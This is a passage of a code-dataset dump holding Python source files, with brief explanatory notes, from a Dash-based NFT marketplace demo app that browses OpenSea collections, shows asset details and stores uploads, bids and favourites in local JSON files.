Output(\"event_list\", \"children\"),\n [Input(\"created\", \"n_clicks\"),\n Input(\"successful\", \"n_clicks\"),\n Input(\"bid_entered\", \"n_clicks\"),\n Input(\"transfer\", \"n_clicks\")]\n)\ndef update_table(n_listings, n_sales, n_bids, n_transfers):\n ctx = dash.callback_context\n\n if not ctx.triggered:\n raise PreventUpdate\n else:\n button_id = ctx.triggered[0]['prop_id'].split('.')[0] # get btn id for event type\n print(button_id)\n data = get_events(button_id)\n return generate_table(data)\n"
},
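`convert_price` above relies on the fixed ratio of 10^18 wei per ETH. A one-line worked example of that conversion:

```python
WEI_PER_ETH = 10 ** 18  # 1 ETH is defined as 10^18 wei

def convert_price(wei):
    return wei / WEI_PER_ETH

print(convert_price(1_500_000_000_000_000_000))  # 1.5 (ETH)
```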
{
"alpha_fraction": 0.5217754244804382,
"alphanum_fraction": 0.533288836479187,
"avg_line_length": 35.32121276855469,
"blob_id": "217c887698c4c4fe4fc9e0a83bddc7fc73dac534",
"content_id": "412a52b35bfbef9e444fcd88932ad489d78d9b2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5993,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 165,
"path": "/apps/upload.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "from app import app\nimport datetime\nimport json\nimport string\nimport secrets\nfrom datetime import datetime\nimport dash_bootstrap_components as dbc\nfrom dash import html, dcc, Input, Output\n\n\ndef create_layout():\n \"\"\"\n Create layout, input form for image, name and description of a NFT\n :return: html to render content\n \"\"\"\n upload_nft_img = html.Div([\n dcc.Upload(\n id='upload-nft-img',\n children=html.Div([\n 'Drag & drop or ',\n html.A('Select file to upload')\n ]),\n style={\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n },\n className=\".w-50 mb-3\",\n multiple=False\n )\n ])\n\n name_input = html.Div(\n [\n dbc.Label(\"Name\"),\n dbc.Input(type=\"text\", id=\"nft-name\", placeholder=\"Enter name\"),\n ],\n className=\"mb-3\",\n )\n\n desc_input = html.Div(\n [\n dbc.Label(\"Description\"),\n dbc.Input(\n type=\"text\",\n id=\"nft-desc\",\n placeholder=\"Enter description\",\n ),\n ],\n className=\"mb-3\",\n )\n\n input_form = dbc.Form([name_input, desc_input])\n\n return html.Div(\n children=[\n html.Div(\n html.H1('Upload NFT', className='header-text text-center mt-3'),\n className=\"header\",\n ),\n upload_nft_img,\n input_form,\n dbc.Button(\n \"Upload\", id=\"upload_nft\", className=\"ml-auto\", n_clicks=0,\n ),\n html.Div(id='nft-data-upload'),\n\n ],\n className=\"main\"\n )\n\n\ndef random_data_gen(length):\n \"\"\"\n Generate random metadata using secure random string. With cryptography no string generated will be the same result\n :param length: length of generated string\n :return: randomized string containing letters and numbers\n \"\"\"\n metadata = ''.join(secrets.choice(string.ascii_letters + string.digits) for x in range(length))\n return str(metadata)\n\n\[email protected](\n Output(\"nft-data-upload\", \"children\"),\n [Input(\"upload_nft\", \"n_clicks\"),\n Input(\"nft-name\", \"value\"),\n Input(\"nft-desc\", \"value\"),\n Input('upload-nft-img', 'contents')\n ]\n)\ndef add_nft(n_upload, name, description, image_url):\n \"\"\"\n Add NFT to local json file with all data\n :param n_upload: upload button click event\n :param name: name input from formgroup\n :param description: description of NFT\n :param image_url: base64 encoded image\n :return: html to render img and table with recap of inputted and generated data\n \"\"\"\n if n_upload:\n if image_url is None:\n return html.P(\"Please upload nft file\")\n else:\n nft_id = random_data_gen(8) # generate data\n token_id = random_data_gen(60)\n contract_address = f\"0x{random_data_gen(40)}\"\n date = datetime.now() # get current time and date\n upload_asset = {\n \"id\": nft_id,\n \"token_id\": token_id,\n \"image_url\": image_url,\n \"name\": name,\n \"description\": description,\n \"asset_contract\": {\n \"address\": contract_address,\n \"asset_contract_type\": \"semi-fungible\",\n \"created_date\": str(date),\n \"name\": \"Stacc Collection\",\n \"owner\": 1920133,\n \"schema_name\": \"ERC1155\",\n \"symbol\": \"STACC\"\n },\n \"owner\": {\n \"user\": {\n \"username\": \"lizardlover23\"\n }\n }\n }\n write_json(upload_asset, 'uploaded_nfts', 'uploads.json')\n\n # create table rows to display all NFT data in\n row1 = html.Tr([html.Td(\"id\"), html.Td(upload_asset['id'])])\n row2 = html.Tr([html.Td(\"token id\"), html.Td(upload_asset['token_id'])])\n row3 = html.Tr([html.Td(\"name\"), html.Td(upload_asset['name'])])\n row4 = html.Tr([html.Td(\"description\"), 
html.Td(upload_asset['description'])])\n row5 = html.Tr([html.Td(\"asset contract address\"), html.Td(upload_asset['asset_contract']['address'])])\n row6 = html.Tr([html.Td(\"asset contract type\"), html.Td(upload_asset['asset_contract']['asset_contract_type'])])\n row7 = html.Tr([html.Td(\"created_date\"), html.Td(upload_asset['asset_contract']['created_date'])])\n row8 = html.Tr([html.Td(\"asset contract name\"), html.Td(upload_asset['asset_contract']['name'])])\n row9 = html.Tr([html.Td(\"asset contract owner\"), html.Td(upload_asset['asset_contract']['owner'])])\n row10 = html.Tr([html.Td(\"schema_name\"), html.Td(upload_asset['asset_contract']['schema_name'])])\n row11 = html.Tr([html.Td(\"symbol\"), html.Td(upload_asset['asset_contract']['symbol'])])\n row12 = html.Tr([html.Td(\"owner\"), html.Td(upload_asset['owner']['user']['username'])])\n table_body = [html.Tbody([row1, row2, row3, row4, row5, row6, row7, row8, row9, row10, row11, row12])]\n return html.Div([\n html.Img(src=image_url, className=\".w-50\"),\n dbc.Table(table_body, bordered=True)\n ])\n\n\ndef write_json(new_json, name, filename):\n \"\"\"\n Write NFT data as object to json file\n :param new_json: NFT in json format\n :param name: value of name in name_value par list\n :param filename: filename of file its stored in\n \"\"\"\n with open(filename, 'r+') as file:\n file_data = json.load(file) # load data into dict\n file_data[name].append(new_json)\n file.seek(0)\n json.dump(file_data, file, indent=4)\n"
},
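One detail worth flagging in `random_data_gen` above: it draws from letters and digits, while a real Ethereum contract address is 20 bytes, i.e. 40 hexadecimal characters after the `0x` prefix. If you wanted the fake addresses to at least look like valid ones, `secrets.token_hex` gives that directly; this is a suggested variant, not what the repository does:

```python
import secrets

def random_contract_address() -> str:
    """20 random bytes rendered as 40 hex characters, shaped like an Ethereum address."""
    return "0x" + secrets.token_hex(20)

print(random_contract_address())  # e.g. 0x3f... (40 hex chars after the prefix)
```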
{
"alpha_fraction": 0.6127066016197205,
"alphanum_fraction": 0.6341099739074707,
"avg_line_length": 40.943180084228516,
"blob_id": "54d615bab840c6ab013f80f55e75854a2490b5c7",
"content_id": "6d8312bc40b577b561a96d2cccee18542fbd3af7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7384,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 176,
"path": "/apps/nft_collections.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas as pd\nimport dash\nimport dash_bootstrap_components as dbc\nfrom dash.exceptions import PreventUpdate\nfrom dash import html, dcc, Input, Output\nfrom app import app\n\n\ndef generate_img_buttons():\n \"\"\"\n Generate image buttons for each collection\n :return: list of image buttons\n \"\"\"\n # selected collections to display\n slugs = ['dotdotdots', 'bears-deluxe', 'sappy-seals', 'gutterpigeons', 'epiceagles', 'infinity-frogs-nft']\n image_links = ['https://lh3.googleusercontent.com/lIo17HAEF8FwPEJZOD9xg'\n '-SLk9hAcDc0sjiviGY63KR1py7BGd78Xpv_SIPfhCINZq16pF-rlwfTuq68dvuL7uhCU_FPKLnT16oS=s120',\n 'https://lh3.googleusercontent.com'\n '/InPgClcuGiNA5TdEGTu7zuGSv1LDJ54L_sC49G7fqJ0YawDcdmN78t7iShcrbyQ_sdoUyjyBAoXVMTKaaf9OP8ekDyBaEEWJMiDbi8M=s120',\n 'https://lh3.googleusercontent.com'\n '/c_wASW_EH06TmUJTAfZ9HYAx8rhKbu3SbOqpHHp0OistKOTJcPDjhSBg3S6OM3HG9ivBpVVtSnKkNJKilZQCc_8V1kTG7JQDSzmWoQ=s120',\n 'https://lh3.googleusercontent.com/UoABiu1ydkR50jb_G2BPJO1I9dQ30o6DzRY2RCPoo'\n '-etNtb77FRj2WxoxG_sYL6C6I5qiu88g6BpAX6GfIGjuFPcZQ_beA_M8TWpQDM=s120',\n 'https://lh3.googleusercontent.com/BMCuX'\n '-_CakY3bKgjl7mxVgAKKug2D1xdWNcenSeKYReZtIfYGD1Uo0BN7nIeDtRIsgu6Xz8b90AYGCqn8EvKWhaiHJ2-OVu0Oos-NA'\n '=s120',\n 'https://lh3.googleusercontent.com'\n '/5tHPLRm3oJiR0xNSIuBvZthmH2bOC81QC2AE6N6tnV1xBzqV8h2QQDJb6IErqEiUp4CEUlUOvcxjB3NDKAajCocluKd577H1u2LU3es=s120']\n\n btn_list = []\n for (slug, url) in zip(slugs, image_links):\n btn = html.Button(id=f'{slug}', className=\"col-btn\", children=[html.Img(src=f'{url}')])\n btn_list.append(btn)\n return html.Div(btn_list, className=\"collection_buttons\")\n\n\ndef get_collection(offset, limit, slug):\n \"\"\"\n Get assets belonging to a certain collection of NFTs, based on the collection id and pagination\n :param offset: offset for the request, calculated by page number\n :param limit: the number of assets fetched per page\n :param slug: collection slug, identifying property belonging to a specific collection\n :return: a dataframe containing data about each NFT\n \"\"\"\n url = \"https://api.opensea.io/api/v1/assets\"\n querystring = {\"offset\": f\"{offset}\", \"limit\": f\"{limit}\", \"collection\": f\"{slug}\"}\n response = requests.request(\"GET\", url, params=querystring)\n data = response.json()\n df = pd.json_normalize(data['assets'])\n # only need a certain set of columns\n col_list = ['id', 'token_id', 'image_url', 'name', 'asset_contract.address', 'collection.name']\n df = pd.DataFrame(df, columns=col_list)\n return df\n\n\ndef create_card(card_img, card_title, token_id, asset_contract_address):\n \"\"\"\n Create individual cards for an NFT\n :param card_img: the img link\n :param card_title: NFT name\n :param token_id: NFT token_id\n :param asset_contract_address: NFT contract address\n :return: a card containing information about a specific NFT\n \"\"\"\n asset_link = dbc.CardLink(\"{name}\".format(name=card_title),\n href=\"/asset?asset_contract_address={address}&token_id={token_id}\".format(\n address=asset_contract_address, token_id=token_id), className=\"card-link\")\n return dbc.Card(\n [\n dbc.CardImg(src=card_img, top=True),\n dbc.CardBody(\n [\n html.H4(asset_link, className=\"card-title\"),\n ],\n className=\"card-body\",\n ),\n ],\n className=\"card border-secondary col\"\n )\n\n\ndef create_cardgrid(offset, limit, slug):\n \"\"\"\n Creates a grid of cards\n :param offset: offset for request\n :param limit: the amount of NFT to be shown on the page\n :param slug: unique ID for a specific 
collection\n    :return: card grid containing cards\n    \"\"\"\n    data = get_collection(offset, limit, slug)\n    cards = []\n    for item in data.index:\n        cards.append(create_card(data['image_url'][item], data['name'][item],\n                                 data['token_id'][item], data['asset_contract.address'][item]))\n    return data['collection.name'][0], html.Div(cards, className=\"col_card_grid row row-cols-4\")\n\n\ndef create_layout():\n    \"\"\"\n    Creates the layout for the collections page\n    :return: layout with all the elements in\n    \"\"\"\n    return html.Div(\n        [\n            dcc.Store(id='slug_memory'),  # local storage for collection slug value\n            html.Div(\n                [\n                    html.H1('Collections', className=\"text-center mt-3\"),\n                    html.P('Explore a few selected collections. Click the image buttons to view each collection.', className=\"text-center\"),\n                    generate_img_buttons(),\n                ],\n                className=\"header\",\n            ),\n            html.Div([\n                html.H1(id=\"col_title\", className=\"text-muted\"),\n                html.Div(id=\"col_pag\"),\n            ], className=\"d-md-flex flex-md-row justify-content-sm-between\"),\n            html.Div(id=\"collection_content\"),\n        ],\n        className=\"main\"\n    )\n\n\[email protected](\n    Output(\"slug_memory\", \"data\"),\n    Output(\"col_pag\", \"children\"),\n    [\n        Input(\"dotdotdots\", \"n_clicks\"),\n        Input(\"bears-deluxe\", \"n_clicks\"),\n        Input(\"sappy-seals\", \"n_clicks\"),\n        Input(\"gutterpigeons\", \"n_clicks\"),\n        Input(\"epiceagles\", \"n_clicks\"),\n        Input(\"infinity-frogs-nft\", \"n_clicks\")\n    ]\n)\ndef trigger_cardgrid(n_col1, n_col2, n_col3, n_col4, n_col5, n_col6):\n    \"\"\"\n    Accepts click event from an image button, and prepares for the displaying of the card grid by saving the collection\n    slug in the browser and setting up pagination controls\n    :param n_col1: img_btn 1 click event\n    :param n_col2: img_btn 2 click event\n    :param n_col3: img_btn 3 click event\n    :param n_col4: img_btn 4 click event\n    :param n_col5: img_btn 5 click event\n    :param n_col6: img_btn 6 click event\n    :return: stores collection slug from image_btn in dcc.Store (localstorage),\n    and outputs pagination element to the app layout\n    \"\"\"\n    ctx = dash.callback_context\n\n    if not ctx.triggered:\n        raise PreventUpdate\n    else:\n        button_id = ctx.triggered[0]['prop_id'].split('.')[0]  # get btn id for slug\n\n        slug = button_id  # collection reference\n        page_view = dbc.Pagination(max_value=5, first_last=True, active_page=1, id=\"collection_pagination\",\n                                   className=\"pagination\")\n        return slug, page_view\n\n\[email protected](Output(\"col_title\", \"children\"),\n              Output(\"collection_content\", \"children\"),\n              [Input(\"slug_memory\", \"data\"), Input(\"collection_pagination\", \"active_page\")])\ndef display_cardgrid(slug, page_no):\n    \"\"\"\n    Create the cardgrid view based on slug, and output the cards to the app layout\n    :param slug: collection slug used to identify the wanted collection\n    :param page_no: current page number from pagination controls\n    :return: card grid layout containing cards for all the assets, with pagination in mind\n    \"\"\"\n    limit = 12\n    offset = (page_no * limit) - limit  # calculate offset\n    return create_cardgrid(offset, limit, slug)\n"
},
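`trigger_cardgrid` above uses the `dash.callback_context` idiom to find out which of several buttons fired: the triggering component arrives as a `prop_id` string of the form `"<component-id>.<property>"`. A stripped-down, self-contained sketch of just that parsing step (the helper `triggered_id` is our name for the pattern, not a Dash API):

```python
def triggered_id(triggered):
    """Extract the component id from dash.callback_context.triggered."""
    if not triggered:
        return None
    # each entry's prop_id looks like "sappy-seals.n_clicks"; keep the part before the dot
    return triggered[0]["prop_id"].split(".")[0]

print(triggered_id([{"prop_id": "sappy-seals.n_clicks", "value": 1}]))  # sappy-seals
```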
{
"alpha_fraction": 0.480361670255661,
"alphanum_fraction": 0.48318734765052795,
"avg_line_length": 33.028846740722656,
"blob_id": "1c8af5dbe268158cb19b32d3b44c928c369e29da",
"content_id": "42bfc3af55645dad80737dab0bed2db8f42caaca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3539,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 104,
"path": "/apps/home.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash_bootstrap_components as dbc\nimport requests\nimport pandas as pd\nfrom dash import html\n\n\ndef get_new_auction():\n \"\"\"\n Get 5 newly created auctions to display in carousel\n :return: dataframe with data about NFTs\n \"\"\"\n url = \"https://api.opensea.io/api/v1/events\"\n querystring = {\"event_type\": \"created\", \"only_opensea\": \"true\", \"offset\": \"0\", \"limit\": \"5\"}\n headers = {\"Accept\": \"application/json\"}\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n data = response.json()\n df = pd.json_normalize(data['asset_events'])\n col_list = ['asset.token_id', 'asset.image_url', 'asset.name', 'asset.contract_address']\n df = pd.DataFrame(df, columns=col_list)\n return df\n\n\ndef create_slides(data):\n \"\"\"\n Create slides for carousel and populate them with data from NFTs\n :param data: dataframe containing NFT data\n :return: list of slides for carousel\n \"\"\"\n slides = []\n for item in data.index:\n slides.append({\n \"key\": item,\n \"src\": data['asset.image_url'][item],\n \"header\": data['asset.name'][item],\n })\n return slides\n\n\ndef create_layout():\n \"\"\"\n Creates the layout for the home page\n :return: layout with all the elements in\n \"\"\"\n carousel = dbc.Carousel(\n items=create_slides(get_new_auction()),\n className=\"carousel\"\n )\n\n cards = dbc.CardGroup(\n [\n dbc.Card(\n dbc.CardBody(\n [\n html.H5(\"Explore\", className=\"card-title text-center\"),\n html.P(\n \"Browse thousands of NFTs on our marketplace, and discover different collections\",\n className=\"card-text\",\n ),\n dbc.CardLink(\"marketplace\", href=\"/marketplace\", className=\"card-link\"),\n dbc.CardLink(\"collections\", href=\"/collections\", className=\"card-link\"),\n ]\n )\n ),\n dbc.Card(\n dbc.CardBody(\n [\n html.H5(\"Sell your NFTs\", className=\"card-title text-center\"),\n html.P(\n \"Upload your own NFTs, add metadata and list them for sale\",\n className=\"card-text\",\n ),\n dbc.CardLink(\"upload here\", href=\"/upload\", className=\"card-link\"),\n ]\n )\n ),\n dbc.Card(\n dbc.CardBody(\n [\n html.H5(\"Profile\", className=\"card-title text-center\"),\n html.P('''On your own profile you can keep track on NFTs your have added to your favourites, \n keep track of the NFTs you have placed bids on and view your uploaded assets ''',\n className=\"card-text\",\n ),\n dbc.CardLink(\"go to profile\", href=\"/profile\", className=\"card-link\"),\n ]\n )\n ),\n ],\n className=\"mt-5\",\n )\n\n return html.Div(\n [\n html.Div(\n [\n html.H1('New auctions', className='header-text text-center mt-3'),\n ],\n className=\"header\",\n ),\n carousel,\n cards,\n ],\n className=\"main\"\n )\n"
},
{
"alpha_fraction": 0.5088105797767639,
"alphanum_fraction": 0.5122284889221191,
"avg_line_length": 36.83333206176758,
"blob_id": "8d17561b9fa74330d289c86cc8be1f7b1777e433",
"content_id": "5e12ca9359590b9da5a9dadab10c8e671d9503a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13166,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 348,
"path": "/apps/asset.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas as pd\nimport json\nimport dash_bootstrap_components as dbc\nfrom urllib.parse import urlparse, parse_qsl\nfrom dash import html, dcc, Input, Output, State\nfrom app import app\n\n\ndef get_single_asset(asset_contract_address, token_id):\n \"\"\"\n Get a single asset\n :param asset_contract_address:\n :param token_id:\n :return: dataframe with asset data\n \"\"\"\n url = \"https://api.opensea.io/api/v1/asset/{asset_contract_address}/{token_id}/\".format(\n asset_contract_address=asset_contract_address, token_id=token_id)\n response = requests.request(\"GET\", url)\n data = response.json()\n df = pd.json_normalize(data)\n df = pd.DataFrame(df)\n df_orders = pd.json_normalize(data['orders'])\n pd.set_option('display.max_colwidth', None) # extend colwidth to display whole value, instead of partial values\n return df, df_orders\n\n\ndef get_more_from_collection(collection):\n \"\"\"\n Get 5 similar NFTs from the same collection\n :param collection: colleciton id/slug\n :return: dataframe with data\n \"\"\"\n url = \"https://api.opensea.io/api/v1/assets\"\n querystring = {\"limit\": \"5\", \"collection\": f\"{collection}\"}\n response = requests.request(\"GET\", url, params=querystring)\n data = response.json()\n df = pd.json_normalize(data['assets'])\n col_list = ['id', 'token_id', 'name', 'image_url', 'asset_contract.address']\n df = pd.DataFrame(df, columns=col_list)\n return df\n\n\n# create card with image and button to opensea\ndef create_card(card_img, card_title, token_id, asset_contract_address):\n asset_link = dbc.CardLink(\"{name}\".format(name=card_title),\n href=\"/asset?asset_contract_address={address}&token_id={token_id}\".format(\n address=asset_contract_address, token_id=token_id))\n return dbc.Card(\n [\n dbc.CardImg(src=card_img, top=True),\n dbc.CardBody(\n html.H4(asset_link, className=\"card-title\"),\n className=\"card-body\",\n ),\n ],\n className=\"card border-primary col\"\n )\n\n\ndef gen_traits(asset):\n \"\"\"\n Generate trait grid\n :param asset: asset data\n :return: a trait card for every trait the NFT possesses\n \"\"\"\n if asset[\"traits\"].to_string(index=False) == '[]': # maybe not the prettiest way to check if traits exists\n return html.P(\"This NFT has no traits\")\n else:\n asset_traits = pd.json_normalize(asset['traits']).unstack().apply(pd.Series)\n asset_traits['trait_count'] = round(asset_traits['trait_count'].astype(float)/100)\n trait_cards = []\n for trait in asset_traits.index:\n percent = asset_traits['trait_count'][trait]\n card = dbc.Card(\n dbc.CardBody(\n [\n html.H6(asset_traits['trait_type'][trait], className=\"card-subtitle text-info text-center\"),\n html.H4(asset_traits['value'][trait], className=\"card-title text-center\"),\n html.P(\n f\"{percent}% have this trait\",\n className=\"card-text text-muted text-center\",\n ),\n ],\n className=\"card-body\",\n ),\n className=\"card border-info col\",\n )\n trait_cards.append(card)\n return html.Div(trait_cards, className=\"col_card_grid row row-cols-3\")\n\n\ndef calculate_price(asset_orders):\n \"\"\"\n Convert prices from wei to ETH and usd\n :param asset_orders: asset order details\n :return: html to render currency amount\n \"\"\"\n if 'current_price' in asset_orders.columns:\n current_price = (\n asset_orders['current_price'][0] / pow(10, asset_orders['payment_token_contract.decimals'][0]))\n current_price_usd = (((asset_orders['current_price'][0] / pow(10, asset_orders[\n 'payment_token_contract.decimals'][0])) * 
asset_orders['payment_token_contract.usd_price'][0]) /\n asset_orders['quantity'][0])\n return dbc.ListGroupItem(\n [\n html.H5('Current price'),\n html.Div([\n html.Img(src='{url}'.format(url=asset_orders['payment_token_contract.image_url'][0]),\n id=\"price_symbol\"),\n html.Small(current_price),\n html.Small(f'(${current_price_usd})'),\n dbc.Tooltip(asset_orders['payment_token_contract.symbol'][0],\n target=\"price_symbol\",\n ),\n ]),\n ],\n )\n else:\n return dbc.ListGroupItem(\n [\n html.H5('Current price'),\n html.Div([\n html.Small(\"No bids yet\"),\n ]),\n ],\n )\n\n\ndef create_layout(url_query):\n # get asset corresponding to the ones the user clicked on earlier\n asset_contract_address = url_query['asset_contract_address']\n token_id = url_query['token_id']\n dcc.Location(id='url', refresh=False),\n asset, asset_orders = get_single_asset(asset_contract_address, token_id)\n if 'current_price' in asset_orders.columns:\n # if current bids exists, convert values to float/int to calculate prices\n asset_orders['current_price'] = asset_orders['current_price'].astype(float)\n asset_orders['payment_token_contract.usd_price'] = asset_orders['payment_token_contract.usd_price'].astype(\n float)\n asset_orders['quantity'] = asset_orders['quantity'].astype(int)\n\n def create_cardgrid():\n data = get_more_from_collection(asset['collection.slug'].to_string(index=False))\n cards = []\n for item in data.index:\n cards.append(create_card(data['image_url'][item], data['name'][item],\n data['token_id'][item],\n data['asset_contract.address'][item]))\n return html.Div(cards, className=\"col_card_grid row row-cols-5\")\n\n bid_window = dbc.Modal(\n [\n dbc.ModalHeader(\"Bid\"),\n dbc.ModalBody([html.P(\"Put in your bid. Decimals are indicated with .\"),\n html.P(f\"You must bid higher than current price\")]),\n dbc.InputGroup(\n [\n dbc.Input(id=\"bid_amount\", placeholder=\"Amount\", type=\"number\"),\n dbc.InputGroupText(\"ETH\"),\n ],\n ),\n html.P(id=\"output_msg_bid\", className=\"text-center\"),\n dbc.ModalFooter([\n dbc.Button(\n \"Confirm\", id=\"confirm_bid\", className=\"ml-auto btn btn-success\", n_clicks=0\n ),\n dbc.Button(\n \"Close\", id=\"close_modal\", className=\"ml-auto\", n_clicks=0,\n )\n ],\n ),\n ],\n id=\"modal\",\n is_open=False,\n )\n\n asset_info = dbc.ListGroup(\n [\n dbc.ListGroupItem(\n html.H5(asset['name']),\n\n ),\n calculate_price(asset_orders),\n dbc.ListGroupItem(\n [\n dbc.Button(\"Place a bid\", id=\"open\", n_clicks=0, className=\"btn btn-primary w-50\"),\n dbc.Button('Save', id='fav_btn', className=\"btn btn-info\"),\n html.P(id=\"output_fav\"),\n ],\n\n ),\n dbc.Tooltip(\n \"You can find a list of your saved assets on your profile\",\n target=\"fav_btn\",\n placement=\"top\",\n ),\n ],\n )\n\n address_link = html.A(\"{name}\".format(name=asset['asset_contract.address'].to_string(index=False)), href='https://etherscan.io/address/{address}'.format(address=asset['asset_contract.address'].to_string(index=False)))\n row1 = html.Tr([html.Td(\"Contract Address\"), address_link])\n row2 = html.Tr([html.Td(\"Token ID\"), html.Td(asset['token_id'])])\n row3 = html.Tr([html.Td(\"Token Standard\"), html.Td(asset['asset_contract.schema_name'])])\n\n table_body = [html.Tbody([row1, row2, row3])]\n\n asset_details = html.Div(\n dbc.Accordion(\n [\n dbc.AccordionItem(\n [\n html.P('Created by ' + asset['creator.user.username'], className=\"text-muted\"),\n html.P(asset['description']),\n ],\n title=\"Description\", className=\"accordion-item\",\n ),\n dbc.AccordionItem(\n 
[\n html.Img(src=\"{url}\".format(url=asset['collection.image_url'].to_string(index=False))),\n html.P(asset['collection.description']),\n ],\n title=\"About \" + asset['collection.name'], className=\"accordion-item\",\n ),\n dbc.AccordionItem(\n gen_traits(asset),\n title=\"Traits\", className=\"accordion-item\",\n ),\n dbc.AccordionItem(\n table_body,\n title=\"Details\", className=\"accordion-item\",\n ),\n dbc.AccordionItem(\n create_cardgrid(),\n title=\"More from this collection\", className=\"accordion-item\",\n ),\n ],\n flush=True,\n className=\"accordion\",\n )\n )\n\n return html.Div(\n children=[\n dcc.Store(id=\"address_token\"),\n html.Div(\n [\n dbc.Row(\n [\n dbc.Card(\n [\n dbc.CardImg(src='{img_url}'.format(img_url=asset['image_url'][0]), top=True),\n dbc.CardBody(\n dbc.Button(\"Open on opensea\", id=\"opensea_link\", n_clicks=0,\n href='{url}'.format(\n url=asset['permalink'].to_string(index=False)),\n className=\"btn btn-primary\")\n ),\n ],\n style={\"width\": \"18rem\"},\n className=\"card border-light\",\n ),\n dbc.Col(asset_info),\n ]\n ),\n ]\n ),\n\n bid_window,\n asset_details,\n ],\n className=\"main mt-3\"\n )\n\n\n# save contract address and token_id in local storage in browser\[email protected](Output(\"address_token\", \"data\"),\n [Input(\"url\", \"href\")])\ndef display_page(path_href):\n # get query string from url as dictionary\n parse_result = urlparse(path_href)\n params = parse_qsl(parse_result.query)\n state = dict(params)\n return state\n\n\[email protected](\n Output(\"modal\", \"is_open\"),\n [Input(\"open\", \"n_clicks\"),\n Input(\"close_modal\", \"n_clicks\")],\n [State(\"modal\", \"is_open\")]\n)\ndef show_modal(n_bid, n_close, is_open):\n if n_bid or n_close:\n return not is_open\n return is_open\n\n\[email protected](\n Output(\"output_msg_bid\", \"children\"),\n [Input(\"confirm_bid\", \"n_clicks\"),\n Input('address_token', 'data')],\n [State(\"bid_amount\", \"value\")]\n)\ndef accept_bid(n_confirm, asset, n_amount):\n if n_confirm:\n bid_asset = {\n \"asset_contract_address\": \"{address}\".format(address=asset['asset_contract_address']),\n \"token_id\": \"{id}\".format(id=asset['token_id']),\n \"price\": \"{price}\".format(price=n_amount)\n }\n add = write_json(bid_asset, 'bids', 'bids.json')\n if add:\n return f\"Bid of {n_amount} ETH accepted!\"\n else:\n return \"Cannot accept a new bid directly after your own\"\n\n\[email protected](\n Output(\"output_fav\", \"children\"),\n [Input(\"fav_btn\", \"n_clicks\"),\n Input('address_token', 'data')]\n)\ndef add_favourite(n_fav, asset):\n if n_fav:\n fav_asset = {\n \"asset_contract_address\": \"{address}\".format(address=asset['asset_contract_address']),\n \"token_id\": \"{id}\".format(id=asset['token_id']),\n }\n write_json(fav_asset, 'favourites', 'favourites.json')\n\n\ndef write_json(new_json, name, filename):\n with open(filename, 'r+') as file:\n file_data = json.load(file) # load data into dict\n add = True\n for x in file_data[name]:\n if (new_json['asset_contract_address'] == x['asset_contract_address'] and new_json['token_id'] == x['token_id']):\n add = False\n if add:\n file_data[name].append(new_json)\n file.seek(0)\n json.dump(file_data, file, indent=4)\n print('yay')\n return True\n else:\n print('error error error')\n return False\n"
},
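The asset page above round-trips the contract address and token id through the URL query string. The `urlparse`/`parse_qsl` combination it uses can be checked in isolation; the href values here are illustrative:

```python
from urllib.parse import urlparse, parse_qsl

href = "/asset?asset_contract_address=0xabc123&token_id=42"  # illustrative values
params = dict(parse_qsl(urlparse(href).query))
print(params)  # {'asset_contract_address': '0xabc123', 'token_id': '42'}
```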
{
"alpha_fraction": 0.6312010288238525,
"alphanum_fraction": 0.6325065493583679,
"avg_line_length": 26.35714340209961,
"blob_id": "d0f7ec318c441eb283832211576c61556012c7a9",
"content_id": "c7f8e1b299cd1bfe8bc3c119653a8417ec993d5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1532,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 56,
"path": "/index.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash\nfrom dash import html\nfrom dash import dcc\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nfrom urllib.parse import urlparse, parse_qsl, urlencode\nfrom app import app\nfrom app import server\nfrom apps import (\n home,\n marketplace,\n nft_collections,\n asset,\n events,\n profile,\n upload\n)\n\nfrom navbar import Navbar\n\napp.layout = html.Div(\n children=[\n dcc.Location(id=\"url\", refresh=False),\n Navbar(),\n html.Div(\n id=\"main-content\", className=\"mx-sm-5 mb-5\"\n )\n ])\n\n\n# Update page when navbar is used\[email protected](Output(\"main-content\", \"children\"),\n [Input(\"url\", \"pathname\"), Input(\"url\", \"href\")])\ndef display_page(path_name, path_href):\n if path_name == \"/marketplace\":\n return marketplace.create_layout()\n elif path_name == \"/collections\":\n return nft_collections.create_layout()\n elif path_name.startswith(\"/asset\"):\n # get query string from url as dictionary\n parse_result = urlparse(path_href)\n params = parse_qsl(parse_result.query)\n state = dict(params)\n return asset.create_layout(state)\n elif path_name == \"/events\":\n return events.create_layout()\n elif path_name == \"/profile\":\n return profile.create_layout()\n elif path_name == \"/upload\":\n return upload.create_layout()\n elif path_name == \"/home\":\n return home.create_layout()\n\n\nif __name__ == '__main__':\n app.run_server(debug=False)\n"
},
{
"alpha_fraction": 0.7248157262802124,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 30.30769157409668,
"blob_id": "0c29d37cc59658cf63f02d4fe0e7344951b1f4b9",
"content_id": "dcdef306659dd6e0503317258355c30294461a6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 407,
